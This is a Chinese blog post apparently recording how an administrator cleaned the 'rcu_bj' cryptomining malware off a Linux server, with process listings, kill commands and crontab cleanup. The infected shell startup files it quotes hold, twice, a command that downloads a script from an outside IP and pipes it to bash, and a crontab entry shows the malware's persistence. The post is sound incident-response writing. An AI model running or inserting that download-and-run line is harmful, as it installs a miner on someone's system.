记录一次挖矿病毒rcu_bj,导致CPU飙高处理

起因应该是gitlab漏洞导致(建议升级版本或者关闭公网)
服务器监控到服务器CPU持续负载很高,登录服务器查看问题
远程连接到服务器显示/root/.bashrc和/root/bash_frofile文件异常 (如下)

[root@zbxserver ~]# ssh 192.168.64.8
Last login: Sat Apr 29 18:48:51 2023 from 192.168.32.14
-bash: /root/.bashrc: line 14: syntax error: unexpected end of file
-bash: /root/.bash_profile: line 14: syntax error: unexpected end of file

top查看,rcu_bj占用CPU

Tasks: 129 total,   1 running, 128 sleeping,   0 stopped,   0 zombie
%Cpu(s): 50.0 us,  4.3 sy,  0.0 ni, 45.5 id,  0.2 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem :  8173780 total,   153720 free,  3089492 used,  4930568 buff/cache
KiB Swap:        0 total,        0 free,        0 used.  2575292 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                                    
 1290 root      20   0 2438492 266040   2752 S  95.3  3.3   1022:12 rcu_bj                                                                                                     
 3649 root      20   0  556024  49620  10252 S   1.0  0.6 305:57.80 hosteye                                                                                                    
32162 root      20   0  113540   1784   1268 S   0.7  0.0   8:55.98 sh                                                                                                         
 1053 work      20   0  799884  16432   4960 S   0.3  0.2  46:10.86 ral-agent                                                                                                  
 1054 work      20   0 1062904  13864   1572 S   0.3  0.2  75:48.77 php-cgi                                                                                                    
 8490 root      20   0   90652   2984   2108 S   0.3  0.0  40:59.38 rngd                                                                                                       
    1 root      20   0   51844   3756   2256 S   0.0  0.0 151:18.76 systemd                                                                                                    
    2 root      20   0       0      0      0 S   0.0  0.0   0:01.27 kthreadd                                                                                                   
    4 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                                                                                               
    6 root      20   0       0      0      0 S   0.0  0.0  14:09.84 ksoftirqd/0                                                                                                
    7 root      rt   0       0      0      0 S   0.0  0.0   2:38.12 migration/0                                                                                                
    8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                                                                                                     
    9 root      20   0       0      0      0 S   0.0  0.0 259:29.46 rcu_sched                                                                                                  
   10 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 lru-add-drain                                                                                              
   11 root      rt   0       0      0      0 S   0.0  0.0   3:46.65 watchdog/0                                                                                                 
   12 root      rt   0       0      0      0 S   0.0  0.0   2:57.72 watchdog/1                                                                                                 
   13 root      rt   0       0      0      0 S   0.0  0.0   2:57.93 migration/1                                                                                                
   14 root      20   0       0      0      0 S   0.0  0.0  14:12.02 ksoftirqd/1                                                                                                
   16 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H                                                                                               
   18 root      20   0       0      0      0 S   0.0  0.0   0:00.00 kdevtmpfs                                                                                                  
   19 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 netns                                                                                                      
   20 root      20   0       0      0      0 S   0.0  0.0   0:21.82 khungtaskd                                                                                                 
   21 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 writeback                                                                                                  
   22 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kintegrityd                                                                                                
   23 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset                                                                                                     
   24 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset                               

打开异常文件发现异常病毒
清除异常配置,如下面得IP地址,肯定是病毒无疑了

[root@localhost ~]#  vim /root/.bashrc
# .bashrc

# User specific aliases and functions

alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'

# Source global definitions
if [ -f /etc/bashrc ]; then
        . /etc/bashrc
fi
(curl -s http://123.30.179.206:8189/solr/.v7/booster || wget -q -O - http://123.30.179.206:8189/solr/.v7/booster | bash -sh >/dev/null 2>&1 &
[root@localhost ~]# vim /root/.bash_profile
# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
        . ~/.bashrc
fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin

export PATH
(curl -s http://123.30.179.206:8189/solr/.v7/booster || wget -q -O - http://123.30.179.206:8189/solr/.v7/booster | bash -sh >/dev/null 2>&1 &

这个病毒一般会注册自动启动服务,所以要先停掉,不然kill掉会重启

[root@localhost ~]#  systemctl disable systemd_s.service
Removed symlink /etc/systemd/system/multi-user.target.wants/systemd_s.service.
You have new mail in /var/spool/mail/root
[root@localhost ~]#  systemctl stop systemd_s.service

现在查看进程kill掉即可,不kill掉3个服务的话你执行crontab -e 时候会自动退出不能编辑

[root@localhost ~]#  ps -ef|grep rcu
root         8     2  0  2021 ?        00:00:00 [rcu_bh]
root         9     2  0  2021 ?        02:58:05 [rcu_sched]
root     22528 18979  0 19:51 pts/0    00:00:00 grep --color=auto rcu
root     24392     1  0 00:58 ?        00:00:20 /bin/sh /usr/lib/sys/rcu_udev
root     24461 24392  1 00:58 ?        00:12:46 /bin/sh /usr/lib/sys/rcu_libk
root     25725     1 90 00:59 ?        16:58:48 /usr/lib/sys/rcu_bj
[root@localhost ~]# kill -9 24392
[root@localhost ~]# kill -9 24461
[root@localhost ~]# kill -9 25725
#清理程序文件
[root@localhost ~]# cd /usr/lib/sys
[root@localhost sys]#  cat /dev/null >rcu_bj
[root@localhost sys]#  cat /dev/null >rcu_libk
[root@localhost sys]#  cat /dev/null >rcu_udev
[root@localhost sys]#  cat /dev/null >systemd
#释放内存
[root@localhost sys]#  echo 1 > /proc/sys/vm/drop_caches
[root@localhost sys]#  echo 2 > /proc/sys/vm/drop_caches
[root@localhost sys]#  echo 3 > /proc/sys/vm/drop_caches
#执行crontab -e 删除第一个病毒执行任务
[root@localhost sys]# crontab -e
*/5 * * * * /bin/bash /usr/lib/sys/systemd
*/5 * * * * /opt/hosteye/bin/upgrade --upgrade_mode=8>/dev/null 2>&1

这个病毒会关闭系统日志,清楚完开启日志 sudo systemctl restart rsyslog

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,839评论 6 482
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,543评论 2 382
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 153,116评论 0 344
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,371评论 1 279
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,384评论 5 374
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,111评论 1 285
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,416评论 3 400
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,053评论 0 259
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,558评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,007评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,117评论 1 334
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,756评论 4 324
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,324评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,315评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,539评论 1 262
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,578评论 2 355
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,877评论 2 345

推荐阅读更多精彩内容